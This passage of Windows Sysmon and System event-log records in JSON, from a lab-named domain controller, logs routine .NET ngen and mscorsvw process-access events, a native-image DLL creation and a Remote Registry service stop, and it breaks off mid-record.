{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21C6-5F25-0000-001078F70900}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21C6-5F25-0000-001078F70900}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:19.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21C7-5F25-0000-0010A3FA0900}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:19.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21C7-5F25-0000-0010A3FA0900}","TargetProcessId":"816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:19.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21C7-5F25-0000-0010A3FA0900}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:19.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21C7-5F25-0000-0010A3FA0900}","TargetProcessId":"816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:19.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21C7-5F25-0000-0010A3FA0900}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:19.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21C7-5F25-0000-0010A3FA0900}","TargetProcessId":"816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76873,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Remote Registry service entered the stopped state.","param1":"Remote Registry","param2":"stopped","EventReceivedTime":"2020-08-01 08:03:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:26.429\r\nProcessGuid: {41C8662E-21C7-5F25-0000-0010A3FA0900}\r\nProcessId: 816\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\330-0\\System.dll\r\nCreationUtcTime: 2020-08-01 08:03:26.429","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:26.429","ProcessGuid":"{41C8662E-21C7-5F25-0000-0010A3FA0900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\330-0\\System.dll","CreationUtcTime":"2020-08-01 08:03:26.429","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:26.757\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21CE-5F25-0000-0010D7000A00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:26.757","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21CE-5F25-0000-0010D7000A00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:26.757\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21CE-5F25-0000-0010D7000A00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:26.757","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21CE-5F25-0000-0010D7000A00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:26.757\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21CE-5F25-0000-0010D7000A00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:26.757","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21CE-5F25-0000-0010D7000A00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:27.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21CF-5F25-0000-00104C040A00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 